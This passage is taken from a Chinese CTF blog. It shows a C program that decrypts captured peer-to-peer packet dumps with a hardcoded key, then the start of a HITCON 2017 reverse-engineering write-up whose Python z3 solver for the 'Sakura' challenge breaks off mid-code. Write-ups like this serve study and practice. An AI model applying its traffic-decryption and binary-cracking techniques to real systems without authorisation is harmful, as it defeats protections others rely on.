class="number">0x35</span>, <span class="number">0x5a</span>, <span class="number">0x99</span>, <span class="number">0xbc</span>, <span class="number">0xad</span>, <span class="number">0xbe</span>, </span><br><span class="line"> <span class="number">0x15</span>, <span class="number">0x53</span>, <span class="number">0x8f</span>, <span class="number">0x33</span>, <span class="number">0x57</span>, <span class="number">0x26</span>, <span class="number">0xcb</span>, <span class="number">0xf1</span>, </span><br><span class="line"> <span class="number">0xff</span>, <span class="number">0xf5</span>, <span class="number">0x77</span>, <span class="number">0x96</span>, <span class="number">0xbf</span>, <span class="number">0x0f</span>, <span class="number">0x52</span>, <span class="number">0xc0</span>, </span><br><span class="line"> <span class="number">0xda</span>, <span class="number">0xaf</span>, <span class="number">0x8c</span>, <span class="number">0x1d</span>, <span class="number">0x2d</span>, <span class="number">0x4f</span>, <span class="number">0x14</span>, <span class="number">0x31</span>, </span><br><span class="line"> <span class="number">0xd7</span>, <span class="number">0x85</span>, <span class="number">0x70</span>, <span class="number">0xe7</span>, <span class="number">0xba</span>, <span class="number">0xf3</span>, <span class="number">0x12</span>, <span class="number">0xee</span>, </span><br><span class="line"> <span class="number">0x07</span>, <span class="number">0x64</span>, <span class="number">0xe5</span>, <span class="number">0x55</span>, <span class="number">0xd8</span>, <span class="number">0x73</span>, <span class="number">0xa7</span>, <span class="number">0xe8</span>, </span><br><span class="line"> <span class="number">0x11</span>, <span class="number">0x05</span>, <span class="number">0x2c</span>, <span class="number">0xc6</span>, <span class="number">0xe4</span>, <span class="number">0x7e</span>, <span class="number">0x75</span>, <span class="number">0x0a</span>, </span><br><span class="line"> <span class="number">0x5b</span>, <span class="number">0x6a</span>, <span class="number">0x62</span>, <span class="number">0x6b</span>, <span class="number">0xcc</span>, <span class="number">0x51</span>, <span class="number">0x23</span>, <span class="number">0xb2</span>, </span><br><span class="line"> <span class="number">0x65</span>, <span class="number">0x74</span>, <span class="number">0xf3</span>, <span class="number">0xf5</span>, <span class="number">0xec</span>, <span class="number">0x68</span>, <span class="number">0x72</span>, <span class="number">0xf3</span>, </span><br><span class="line"> <span class="number">0xbc</span>, <span class="number">0x99</span>, <span class="number">0xab</span>, <span class="number">0x7b</span>, <span class="number">0xf5</span>, <span class="number">0x37</span>, <span class="number">0xc0</span>, <span class="number">0x91</span>, </span><br><span class="line"> <span class="number">0xd2</span>, <span class="number">0x52</span>, <span class="number">0x99</span>, <span class="number">0x99</span>, <span class="number">0xd8</span>, <span class="number">0x4f</span>, <span class="number">0x20</span>, <span class="number">0x5f</span>, </span><br><span class="line"> <span class="number">0x57</span>, <span class="number">0x39</span>, <span class="number">0x44</span>, <span class="number">0x86</span>, <span class="number">0x82</span>, <span class="number">0xd6</span>, <span class="number">0x8e</span>, <span class="number">0x18</span>, </span><br><span class="line"> <span class="number">0xd1</span>, <span class="number">0xbb</span>, <span class="number">0x7b</span>, <span class="number">0x24</span>, <span class="number">0x9a</span>, <span class="number">0x71</span>, <span class="number">0x9f</span>, <span class="number">0x18</span>, </span><br><span class="line"> <span class="number">0x02</span>, <span class="number">0xca</span>, <span class="number">0x91</span>, <span class="number">0xf4</span>, <span class="number">0xe6</span>, <span class="number">0x71</span>, <span class="number">0x1c</span>, <span class="number">0x16</span>, </span><br><span class="line"> <span class="number">0xe1</span>, <span class="number">0x39</span>, <span class="number">0x0d</span>, <span class="number">0x63</span>, <span class="number">0x1f</span>, <span class="number">0x32</span>, <span class="number">0xbb</span>, <span class="number">0x6d</span>, </span><br><span class="line"> <span class="number">0xc8</span>, <span class="number">0xe2</span>, <span class="number">0x83</span>, <span class="number">0x23</span>, <span class="number">0x20</span>, <span class="number">0x36</span>, <span class="number">0x39</span>, <span class="number">0x4c</span>, </span><br><span class="line"> <span class="number">0x6b</span>, <span class="number">0x8e</span>, <span class="number">0x00</span>, <span class="number">0x50</span>, <span class="number">0x03</span>, <span class="number">0x9d</span>, <span class="number">0xae</span>, <span class="number">0x83</span>, </span><br><span class="line"> <span class="number">0x6b</span>, <span class="number">0x0d</span>, <span class="number">0xb8</span>, <span class="number">0x67</span>, <span class="number">0x06</span>, <span class="number">0x34</span>, <span class="number">0xb2</span>, <span class="number">0x0b</span>, </span><br><span class="line"> <span class="number">0xed</span>, <span class="number">0xd5</span>, <span class="number">0x47</span>, <span class="number">0x0e</span>, <span class="number">0x7c</span>, <span class="number">0xd0</span>, <span class="number">0xee</span>, <span class="number">0xa3</span>, </span><br><span class="line"> <span class="number">0x17</span>, <span class="number">0xbf</span>, <span class="number">0xfb</span>, <span class="number">0x4d</span>, <span class="number">0x23</span>, <span class="number">0x04</span>, <span class="number">0x15</span>, <span class="number">0x4c</span>, </span><br><span class="line"> <span class="number">0x54</span>, <span class="number">0xfa</span>, <span class="number">0xd6</span>, <span class="number">0x18</span>, <span class="number">0x0e</span>, <span class="number">0x50</span>, <span class="number">0x61</span>, <span class="number">0xb2</span>, </span><br><span class="line"> <span class="number">0x89</span>, <span class="number">0xee</span>, <span class="number">0x07</span>, <span class="number">0x41</span>, <span class="number">0xdd</span>, <span class="number">0x79</span>, <span class="number">0x3b</span>, <span class="number">0x2f</span>, </span><br><span class="line"> <span class="number">0xa5</span>, <span class="number">0xfa</span>, <span class="number">0xae</span>, <span class="number">0x56</span>, <span class="number">0x39</span>, <span class="number">0x54</span>, <span class="number">0xf2</span>, <span class="number">0xe9</span>, </span><br><span class="line"> <span class="number">0xcd</span>, <span class="number">0x8d</span>, <span class="number">0xa7</span>, <span class="number">0x7e</span>, <span class="number">0x19</span>, <span class="number">0x1b</span>, <span class="number">0x05</span>, <span class="number">0x20</span>, </span><br><span class="line"> <span class="number">0xb2</span>, <span class="number">0x45</span>, <span class="number">0xd8</span>, <span class="number">0x04</span>, <span class="number">0x33</span>, <span class="number">0xaa</span>, <span class="number">0xb7</span>, <span class="number">0x76</span>, </span><br><span class="line"> <span class="number">0x25</span>, <span class="number">0x2d</span>, <span class="number">0x4b</span>, <span class="number">0xaf</span>, <span class="number">0x70</span>, <span class="number">0x3a</span>, <span class="number">0x70</span>, <span class="number">0xf1</span>, </span><br><span class="line"> <span class="number">0x08</span>, <span class="number">0xbf</span>, <span class="number">0x5d</span>, <span class="number">0xc9</span>, <span class="number">0xa9</span>, <span class="number">0xaa</span>, <span class="number">0xf1</span>, <span class="number">0xfc</span>, </span><br><span class="line"> <span class="number">0x16</span>, <span class="number">0x54</span>, <span class="number">0x10</span>, <span class="number">0x70</span>, <span class="number">0x2e</span>, <span class="number">0x58</span>, <span class="number">0x97</span>, <span class="number">0xb3</span>, </span><br><span class="line"> <span class="number">0x39</span>, <span class="number">0x9a</span>, <span class="number">0x6d</span>, <span class="number">0x94</span>, <span class="number">0x43</span>, <span class="number">0xd9</span>, <span class="number">0xab</span>, <span class="number">0x03</span>, </span><br><span class="line"> <span class="number">0x19</span>, <span class="number">0x42</span>, <span class="number">0x56</span>, <span class="number">0xf2</span>, <span class="number">0x31</span>, <span class="number">0x37</span>, <span class="number">0x7d</span>, <span class="number">0xa6</span>, </span><br><span class="line"> <span class="number">0x56</span>, <span class="number">0x4e</span>, <span class="number">0xcc</span>, <span class="number">0x03</span>, <span class="number">0x79</span>, <span class="number">0x9b</span>, <span class="number">0xb3</span>, <span class="number">0xfb</span>, </span><br><span class="line"> <span class="number">0xa7</span>, <span class="number">0xe6</span>, <span class="number">0xca</span>, <span class="number">0xe8</span>, <span class="number">0x50</span>, <span class="number">0xa9</span>, <span class="number">0x72</span>, <span class="number">0xfe</span>, </span><br><span class="line"> <span class="number">0x51</span>, <span class="number">0x08</span>, <span class="number">0x9b</span>, <span class="number">0xcb</span>, <span class="number">0x3a</span>, <span class="number">0x6a</span>, <span class="number">0x33</span>, <span class="number">0x2a</span>, </span><br><span class="line"> <span class="number">0xae</span>, <span class="number">0xba</span>, <span class="number">0xfa</span>, <span class="number">0xcf</span>, <span class="number">0x20</span>, <span class="number">0x0c</span>, <span class="number">0xd3</span>, <span class="number">0x35</span>, </span><br><span class="line"> <span class="number">0x94</span>, <span class="number">0xaa</span>, <span class="number">0x63</span>, <span class="number">0x96</span>, <span class="number">0x8e</span>, <span class="number">0x73</span>, <span class="number">0x78</span>, <span class="number">0x4d</span>, </span><br><span class="line"> <span class="number">0x61</span>, <span class="number">0xd6</span>, <span class="number">0x7d</span>, <span class="number">0x9f</span>, <span class="number">0x55</span>, <span class="number">0x22</span>, <span class="number">0x27</span>, <span class="number">0x7b</span>, </span><br><span class="line"> <span class="number">0x88</span>, <span class="number">0x7c</span>, <span class="number">0xe5</span>, <span class="number">0x51</span>, <span class="number">0xe4</span>, <span class="number">0x17</span>, <span class="number">0x8f</span>, <span class="number">0xcb</span>, </span><br><span class="line"> <span class="number">0x36</span>, <span class="number">0x4b</span>, <span class="number">0x70</span>, <span class="number">0xd9</span>, <span class="number">0x23</span>, <span class="number">0x7c</span>, <span class="number">0xf2</span>, <span class="number">0xfc</span>, </span><br><span class="line"> <span class="number">0x97</span>, <span class="number">0x19</span>, <span class="number">0xed</span>, <span class="number">0xdc</span>, <span class="number">0xc2</span>, <span class="number">0xce</span>, <span class="number">0xd5</span>, <span class="number">0xb2</span>, </span><br><span class="line"> <span class="number">0x42</span>, <span class="number">0x61</span>, <span class="number">0x4d</span>, <span class="number">0xb4</span>, <span class="number">0x5a</span>, <span class="number">0x3d</span>, <span class="number">0x94</span>, <span class="number">0x71</span>, </span><br><span class="line"> <span class="number">0x2f</span>, <span class="number">0x3b</span>, <span class="number">0x64</span>, <span class="number">0xd2</span>, <span class="number">0x66</span>, <span class="number">0x79</span>, <span class="number">0x1e</span>, <span class="number">0x6e</span>, </span><br><span class="line"> <span class="number">0x9d</span>, <span class="number">0xe4</span>, <span class="number">0xe9</span>, <span class="number">0x7d</span>, <span class="number">0x69</span>, <span class="number">0x70</span>, <span class="number">0x48</span>, <span class="number">0x56</span>, </span><br><span class="line"> <span class="number">0x04</span>, <span class="number">0xba</span>, <span class="number">0x35</span>, <span class="number">0x81</span>, <span class="number">0x05</span>, <span class="number">0x3a</span>, <span class="number">0xc0</span>, <span class="number">0x04</span>, </span><br><span class="line"> <span class="number">0x24</span>, <span class="number">0x48</span>, <span class="number">0x9a</span>, <span class="number">0x44</span>, <span class="number">0xd5</span>, <span class="number">0x14</span>, <span class="number">0xd3</span>, <span class="number">0xdf</span>, </span><br><span class="line"> <span class="number">0x06</span>, <span class="number">0x48</span>, <span class="number">0xe0</span>, <span class="number">0xbb</span>, <span class="number">0xb5</span>, <span class="number">0xb7</span>, <span class="number">0x77</span>, <span class="number">0xf5</span>, </span><br><span class="line"> <span class="number">0xbf</span>, <span class="number">0x33</span>, <span class="number">0xc5</span>, <span class="number">0x01</span>, <span class="number">0x8e</span>, <span class="number">0xeb</span>, <span class="number">0x66</span>, <span class="number">0x60</span>, </span><br><span class="line"> <span class="number">0x24</span>, <span class="number">0xd1</span>, <span class="number">0x7c</span>, <span class="number">0xe7</span>, <span class="number">0xec</span>, <span class="number">0x48</span>, <span class="number">0xe3</span>, <span class="number">0x63</span>, </span><br><span class="line"> <span class="number">0xcf</span>, <span class="number">0x8b</span>, <span class="number">0xab</span>, <span class="number">0x6c</span>, <span class="number">0x93</span>, <span class="number">0xa2</span>, <span class="number">0x88</span>, <span class="number">0xa0</span>, </span><br><span class="line"> <span class="number">0x47</span>, <span class="number">0x50</span>, <span class="number">0xf4</span>, <span class="number">0xcf</span>, <span class="number">0xd2</span>, <span class="number">0x12</span>, <span class="number">0xb0</span>, <span class="number">0x6e</span>, </span><br><span class="line"> <span class="number">0x20</span>, <span class="number">0x22</span>, <span class="number">0xcc</span>, <span class="number">0x86</span>, <span class="number">0xd6</span>, <span class="number">0xbc</span>, <span class="number">0x0c</span>, <span class="number">0xe2</span>, </span><br><span class="line"> <span class="number">0x4a</span>, <span class="number">0x99</span>, <span class="number">0xb8</span>, <span class="number">0x48</span>, <span class="number">0xd1</span>, <span class="number">0x1c</span>, <span class="number">0xf9</span>, <span class="number">0x4a</span>, </span><br><span class="line"> <span class="number">0x7d</span>, <span class="number">0x0f</span>, <span class="number">0x7d</span>, <span class="number">0x82</span>, <span class="number">0x45</span>, <span class="number">0x0a</span>, <span class="number">0x41</span>, <span class="number">0xff</span>, </span><br><span class="line"> <span class="number">0xc7</span>, <span class="number">0x21</span> };</span><br><span class="line"> <span class="type">char</span> peer1_8[] = { <span class="comment">/* Packet 216 */</span></span><br><span class="line"> <span class="number">0xac</span>, <span class="number">0x3b</span>, <span class="number">0x5b</span>, <span class="number">0xa0</span>, <span class="number">0xa1</span>, <span class="number">0xc4</span>, <span class="number">0x71</span>, <span class="number">0x55</span>, </span><br><span class="line"> <span class="number">0x6d</span>, <span class="number">0x55</span>, <span class="number">0xa0</span>, <span class="number">0x0d</span> };</span><br><span class="line"> <span class="type">char</span> peer0_9[] = { <span class="comment">/* Packet 217 */</span></span><br><span class="line"> <span class="number">0xa7</span>, <span class="number">0x05</span>, <span class="number">0xd3</span>, <span class="number">0x10</span>, <span class="number">0xcf</span>, <span class="number">0x6d</span>, <span class="number">0x3e</span>, <span class="number">0x7f</span>, </span><br><span class="line"> <span class="number">0xcb</span>, <span class="number">0x42</span>, <span class="number">0xa9</span>, <span class="number">0x6e</span>, <span class="number">0xb7</span>, <span class="number">0xd8</span>, <span class="number">0x60</span>, <span class="number">0x37</span>, </span><br><span class="line"> <span class="number">0xfb</span>, <span class="number">0x4a</span>, <span class="number">0xa1</span>, <span class="number">0x14</span>, <span class="number">0x83</span>, <span class="number">0x19</span>, <span class="number">0xe1</span>, <span class="number">0x8f</span>, </span><br><span class="line"> <span class="number">0x17</span>, <span class="number">0x5a</span>, <span class="number">0x61</span>, <span class="number">0xfb</span>, <span class="number">0x0b</span>, <span class="number">0x98</span>, <span class="number">0x35</span>, <span class="number">0xb7</span>, </span><br><span class="line"> <span class="number">0x66</span>, <span class="number">0x2c</span>, <span class="number">0xa7</span>, <span class="number">0xde</span>, <span class="number">0x3b</span>, <span class="number">0x5c</span>, <span class="number">0x69</span>, <span class="number">0x89</span>, </span><br><span class="line"> <span class="number">0x01</span>, <span class="number">0xb9</span>, <span class="number">0x48</span>, <span class="number">0xde</span>, <span class="number">0xab</span>, <span class="number">0x75</span>, <span class="number">0x1e</span>, <span class="number">0x38</span>, </span><br><span class="line"> <span class="number">0x99</span>, <span class="number">0x5e</span>, <span class="number">0x76</span>, <span class="number">0xd8</span>, <span class="number">0xee</span>, <span class="number">0x1d</span>, <span class="number">0x85</span>, <span class="number">0x22</span>, </span><br><span class="line"> <span class="number">0x63</span>, <span class="number">0x9a</span>, <span class="number">0x2b</span>, <span class="number">0xa2</span>, <span class="number">0xd7</span>, <span class="number">0x6b</span>, <span class="number">0x89</span>, <span class="number">0x30</span>, </span><br><span class="line"> <span class="number">0x04</span>, <span class="number">0x1a</span>, <span class="number">0x54</span>, <span class="number">0x96</span>, <span class="number">0x90</span>, <span class="number">0xc1</span>, <span class="number">0x8e</span>, <span class="number">0x9a</span>, </span><br><span class="line"> <span class="number">0xa5</span>, <span class="number">0x87</span>, <span class="number">0x4a</span>, <span class="number">0x53</span>, <span class="number">0xdc</span>, <span class="number">0x83</span>, <span class="number">0x34</span>, <span class="number">0x58</span>, </span><br><span class="line"> <span class="number">0x03</span>, <span class="number">0xde</span>, <span class="number">0x8b</span>, <span class="number">0x15</span>, <span class="number">0xb7</span>, <span class="number">0x2e</span>, <span class="number">0x96</span>, <span class="number">0x35</span>, </span><br><span class="line"> <span class="number">0x26</span>, <span class="number">0xa5</span>, <span class="number">0x59</span>, <span class="number">0xcd</span>, <span class="number">0x27</span>, <span class="number">0xbc</span>, <span class="number">0x52</span>, <span class="number">0x47</span>, </span><br><span class="line"> <span class="number">0xa0</span>, <span class="number">0x1b</span>, <span class="number">0xe3</span>, <span class="number">0x30</span>, <span class="number">0x77</span>, <span class="number">0xa1</span>, <span class="number">0x4c</span>, <span class="number">0x8f</span>, </span><br><span class="line"> <span class="number">0x69</span>, <span class="number">0x01</span>, <span class="number">0x65</span>, <span class="number">0x49</span>, <span class="number">0xb0</span>, <span class="number">0x5e</span>, <span class="number">0x5c</span>, <span class="number">0xa1</span>, </span><br><span class="line"> <span class="number">0x2e</span>, <span class="number">0x6a</span>, <span class="number">0xd4</span>, <span class="number">0xd5</span>, <span class="number">0x14</span>, <span class="number">0x8b</span>, <span class="number">0xe4</span>, <span class="number">0xbd</span>, </span><br><span class="line"> <span class="number">0x3e</span>, <span class="number">0x2a</span>, <span class="number">0x92</span>, <span class="number">0x19</span>, <span class="number">0x47</span>, <span class="number">0x07</span>, <span class="number">0x4d</span>, <span class="number">0x59</span>, </span><br><span class="line"> <span class="number">0x63</span>, <span class="number">0x37</span>, <span class="number">0x65</span>, <span class="number">0xcb</span>, <span class="number">0x75</span>, <span class="number">0x9c</span>, <span class="number">0x73</span>, <span class="number">0xd0</span>, </span><br><span class="line"> <span class="number">0xf1</span>, <span class="number">0xa6</span>, <span class="number">0xae</span>, <span class="number">0xaf</span>, <span class="number">0x7a</span>, <span class="number">0xf1</span>, <span class="number">0xbc</span>, <span class="number">0x7c</span>, </span><br><span class="line"> <span class="number">0x33</span> };</span><br><span class="line"> <span class="type">char</span> peer1_9[] = { <span class="comment">/* Packet 219 */</span></span><br><span class="line"> <span class="number">0x66</span>, <span class="number">0xa0</span>, <span class="number">0xc4</span>, <span class="number">0xe8</span>, <span class="number">0x17</span>, <span class="number">0xd6</span>, <span class="number">0xb9</span>, <span class="number">0x88</span>, </span><br><span class="line"> <span class="number">0x5f</span>, <span class="number">0xcd</span>, <span class="number">0x50</span>, <span class="number">0x8e</span>, <span class="number">0x86</span>, <span class="number">0x05</span>, <span class="number">0x9a</span>, <span class="number">0x2b</span>, </span><br><span class="line"> <span class="number">0xce</span> };</span><br><span class="line"> <span class="type">char</span> peer0_10[] = { <span class="comment">/* Packet 220 */</span></span><br><span class="line"> <span class="number">0x35</span>, <span class="number">0x17</span>, <span class="number">0xb5</span>, <span class="number">0xe0</span>, <span class="number">0x9d</span>, <span class="number">0xce</span>, <span class="number">0xfc</span>, <span class="number">0x4a</span>, </span><br><span class="line"> <span class="number">0xd5</span>, <span class="number">0x0b</span>, <span class="number">0x99</span>, <span class="number">0xef</span>, <span class="number">0x64</span>, <span class="number">0x41</span>, <span class="number">0x51</span>, <span class="number">0x03</span>, </span><br><span class="line"> <span class="number">0xbd</span>, <span class="number">0xf6</span>, <span class="number">0xc3</span>, <span class="number">0x09</span>, <span class="number">0xb7</span>, <span class="number">0x10</span>, <span class="number">0x11</span>, <span class="number">0xb0</span>, </span><br><span class="line"> <span class="number">0x07</span>, <span class="number">0x76</span>, <span class="number">0x32</span>, <span class="number">0x03</span>, <span class="number">0xdf</span>, <span class="number">0x4c</span>, <span class="number">0x03</span>, <span class="number">0x23</span>, </span><br><span class="line"> <span class="number">0xb7</span>, <span class="number">0x83</span>, <span class="number">0xb9</span>, <span class="number">0x98</span>, <span class="number">0x79</span>, <span class="number">0xa4</span>, <span class="number">0x7d</span>, <span class="number">0x3e</span>, </span><br><span class="line"> <span class="number">0x5a</span>, <span class="number">0x09</span>, <span class="number">0x4b</span>, <span class="number">0x55</span>, <span class="number">0xb6</span>, <span class="number">0xd4</span>, <span class="number">0x89</span>, <span class="number">0x60</span>, </span><br><span class="line"> <span class="number">0x28</span>, <span class="number">0x49</span>, <span class="number">0xff</span>, <span class="number">0x00</span>, <span class="number">0xf8</span>, <span class="number">0xf6</span>, <span class="number">0xa6</span>, <span class="number">0xcc</span>, </span><br><span class="line"> <span class="number">0xbb</span>, <span class="number">0x96</span>, <span class="number">0xc0</span>, <span class="number">0x71</span>, <span class="number">0x49</span>, <span class="number">0xb5</span>, <span class="number">0x5d</span>, <span class="number">0xed</span>, </span><br><span class="line"> <span class="number">0x57</span>, <span class="number">0x8b</span>, <span class="number">0x07</span>, <span class="number">0x69</span>, <span class="number">0x2a</span>, <span class="number">0xd1</span>, <span class="number">0x3b</span>, <span class="number">0x2e</span>, </span><br><span class="line"> <span class="number">0xa2</span>, <span class="number">0x62</span>, <span class="number">0x93</span>, <span class="number">0x98</span>, <span class="number">0x1e</span>, <span class="number">0x70</span>, <span class="number">0xe0</span>, <span class="number">0x55</span>, </span><br><span class="line"> <span class="number">0xe6</span>, <span class="number">0x92</span>, <span class="number">0x61</span>, <span class="number">0x7f</span>, <span class="number">0x78</span>, <span class="number">0x0b</span>, <span class="number">0x4d</span>, <span class="number">0x84</span>, </span><br><span class="line"> <span class="number">0xc6</span>, <span class="number">0xc2</span>, <span class="number">0x2a</span>, <span class="number">0x23</span>, <span class="number">0x4a</span>, <span class="number">0x39</span>, <span class="number">0x88</span>, <span class="number">0x2b</span>, </span><br><span class="line"> <span class="number">0xf8</span>, <span class="number">0x13</span>, <span class="number">0x76</span>, <span class="number">0x86</span>, <span class="number">0x64</span>, <span class="number">0x80</span>, <span class="number">0x47</span>, <span class="number">0x33</span>, </span><br><span class="line"> <span class="number">0x76</span>, <span class="number">0x9c</span>, <span class="number">0x00</span>, <span class="number">0xd9</span>, <span class="number">0x98</span>, <span class="number">0x0d</span>, <span class="number">0x92</span>, <span class="number">0x19</span>, </span><br><span class="line"> <span class="number">0x93</span>, <span class="number">0x15</span>, <span class="number">0x0b</span>, <span class="number">0x80</span>, <span class="number">0xad</span>, <span class="number">0x15</span>, <span class="number">0x2e</span>, <span class="number">0x6c</span>, </span><br><span class="line"> <span class="number">0x2d</span>, <span class="number">0x1b</span>, <span class="number">0xd0</span>, <span class="number">0xf8</span>, <span class="number">0x15</span>, <span class="number">0x2f</span>, <span class="number">0x6b</span>, <span class="number">0xbc</span>, </span><br><span class="line"> <span class="number">0xd2</span>, <span class="number">0x99</span>, <span class="number">0x4b</span>, <span class="number">0xac</span>, <span class="number">0xe2</span>, <span class="number">0x6e</span>, <span class="number">0x32</span>, <span class="number">0xd8</span>, </span><br><span class="line"> <span class="number">0x68</span>, <span class="number">0x95</span>, <span class="number">0x03</span>, <span class="number">0x1b</span>, <span class="number">0xf5</span>, <span class="number">0xf1</span>, <span class="number">0xc4</span>, <span class="number">0xeb</span>, </span><br><span class="line"> <span class="number">0x18</span>, <span class="number">0xc3</span> };</span><br><span class="line"> <span class="type">char</span> peer1_10[] = { <span class="comment">/* Packet 222 */</span></span><br><span class="line"> <span class="number">0x5b</span>, <span class="number">0x7c</span>, <span class="number">0xae</span>, <span class="number">0x1a</span>, <span class="number">0x19</span>, <span class="number">0x88</span>, <span class="number">0x75</span>, <span class="number">0x7e</span>, </span><br><span class="line"> <span class="number">0xab</span>, <span class="number">0x08</span>, <span class="number">0x6f</span>, <span class="number">0x1e</span>, <span class="number">0xaa</span>, <span class="number">0x04</span>, <span class="number">0x0e</span>, <span class="number">0x0d</span>, </span><br><span class="line"> <span class="number">0xff</span>, <span class="number">0x7c</span>, <span class="number">0x0e</span>, <span class="number">0xef</span>, <span class="number">0xd0</span>, <span class="number">0x79</span>, <span class="number">0x8e</span> };</span><br><span class="line"> <span class="type">char</span> peer0_11[] = { <span class="comment">/* Packet 223 */</span></span><br><span class="line"> <span class="number">0x38</span>, <span class="number">0x22</span>, <span class="number">0xd8</span>, <span class="number">0x99</span>, <span class="number">0xe8</span>, <span class="number">0x7b</span>, <span class="number">0x5e</span>, <span class="number">0x3a</span>, </span><br><span class="line"> <span class="number">0x34</span>, <span class="number">0x88</span>, <span class="number">0xc8</span>, <span class="number">0x14</span>, <span class="number">0x7d</span>, <span class="number">0xc0</span>, <span class="number">0xac</span>, <span class="number">0x7c</span>, </span><br><span class="line"> <span class="number">0xdb</span>, <span class="number">0x6f</span>, <span class="number">0x66</span>, <span class="number">0x69</span>, <span class="number">0xd1</span>, <span class="number">0x3e</span>, <span class="number">0x48</span>, <span class="number">0x69</span>, </span><br><span class="line"> <span class="number">0x68</span>, <span class="number">0x62</span>, <span class="number">0x19</span>, <span class="number">0xb0</span>, <span class="number">0x62</span>, <span class="number">0xe7</span>, <span class="number">0x54</span>, <span class="number">0x93</span>, </span><br><span class="line"> <span class="number">0x1f</span>, <span class="number">0xa5</span>, <span class="number">0xaf</span>, <span class="number">0x19</span>, <span class="number">0x64</span>, <span class="number">0x73</span>, <span class="number">0x26</span>, <span class="number">0xe2</span>, </span><br><span class="line"> <span class="number">0xc1</span>, <span class="number">0x03</span>, <span class="number">0x55</span>, <span class="number">0xbb</span>, <span class="number">0x43</span>, <span class="number">0x97</span>, <span class="number">0xb6</span> };</span><br><span class="line"> </span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DEC(x) decrypt(&context,x,sizeof(x));puts(x);</span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc,<span class="type">char</span> **argv)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">char</span> key[<span class="number">0x20</span>] = {<span class="number">0xb0</span>, <span class="number">0xf8</span>, <span class="number">0x70</span>, <span class="number">0xfb</span>, <span class="number">0x75</span>, <span class="number">0x87</span>, <span class="number">0xc0</span>, <span class="number">0x48</span>, </span><br><span class="line"> <span class="number">0x2b</span>, <span class="number">0xb7</span>, <span class="number">0xf7</span>, <span class="number">0xc1</span>, <span class="number">0xf7</span>, <span class="number">0x39</span>, <span class="number">0x1f</span>, <span class="number">0x9e</span>, </span><br><span class="line"> <span class="number">0x66</span>, <span class="number">0xde</span>, <span class="number">0x2c</span>, <span class="number">0xd9</span>, <span class="number">0x25</span>, <span class="number">0x58</span>, <span class="number">0xca</span>, <span class="number">0x1f</span>, </span><br><span class="line"> <span class="number">0x87</span>, <span class="number">0xf2</span>, <span class="number">0xdf</span>, <span class="number">0x23</span>, <span class="number">0x2f</span>, <span class="number">0xed</span>, <span class="number">0xc7</span>, <span class="number">0xda</span> };</span><br><span class="line"> ctx context;</span><br><span class="line"> crypt_ctx_init(&context,key);</span><br><span class="line"> DEC(peer1_2)</span><br><span class="line"> DEC(peer0_3);</span><br><span class="line"> DEC(peer1_3);</span><br><span class="line"> DEC(peer0_4);</span><br><span class="line"> DEC(peer1_4);</span><br><span class="line"> DEC(peer0_5);</span><br><span class="line"> DEC(peer1_5);</span><br><span class="line"> DEC(peer0_6);</span><br><span class="line"> DEC(peer1_6);</span><br><span class="line"> DEC(peer0_7);</span><br><span class="line"> DEC(peer1_7);</span><br><span class="line"> DEC(peer0_8);</span><br><span class="line"> DEC(peer1_8);</span><br><span class="line"> DEC(peer0_9);</span><br><span class="line"> DEC(peer1_9);</span><br><span class="line"> DEC(peer0_10);</span><br><span class="line"> DEC(peer1_10);</span><br><span class="line"> DEC(peer0_11);</span><br><span class="line"> <span class="comment">//DEC(peer0_4);</span></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
2017-11-13T00:51:31.000Z
https://azure.kdays.cn/2017/11/08/HITCON2017-writeup/
HITCON2017 writeup
<h1 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h1><h2 id="Sakura"><a href="#Sakura" class="headerlink" title="Sakura"></a>Sakura</h2><p>一个大函数、稍微IDA里标一下函数名然后grep出来调用顺序到文件,然后把栈上那些变量按顺序填入<code>d = dict()</code>然后直接z3</p>
<span id="more"></span>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> z3</span><br><span class="line">x = [z3.BitVec(i, <span class="number">16</span>) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">400</span>)]</span><br><span class="line">s = z3.Solver()</span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string"> pEnd = get_end_pointer_2rp((__int64)&v904);</span></span><br><span class="line"><span class="string"> if ( sum != 17 )</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">l = <span class="built_in">open</span>(<span class="string">'haha'</span>,<span class="string">'r'</span>).read().split(<span class="string">')\n'</span>)</span><br><span class="line"><span class="keyword">for</span> token <span class="keyword">in</span> l:</span><br><span class="line"> <span class="keyword">if</span> <span class="string">'rp('</span> <span class="keyword">not</span> <span class="keyword">in</span> token: <span class="keyword">break</span></span><br><span class="line"> <span class="built_in">print</span> token</span><br><span class="line"> pos = token.index(<span class="string">'rp('</span>)</span><br><span class="line"> cparameter = <span class="built_in">int</span>(token[pos-<span class="number">1</span>:pos],<span class="number">10</span>)</span><br><span class="line"> pos = token.index(<span class="string">'&v'</span>)+<span class="number">1</span></span><br><span class="line"> <span class="built_in">print</span> token[pos+<span class="number">2</span>:token.index(<span class="string">';'</span>)-<span class="number">2</span>]</span><br><span class="line"> oparameter = <span class="built_in">int</span>(token[pos+<span class="number">1</span>:token.index(<span class="string">';'</span>)-<span class="number">1</span>],<span class="number">10</span>)</span><br><span class="line"> pos = token.index(<span class="string">'!= '</span>)</span><br><span class="line"> final = <span class="built_in">int</span>(token[pos+<span class="number">3</span>:],<span class="number">10</span>)</span><br><span class="line"> flag = <span class="number">0</span></span><br><span class="line"> <span 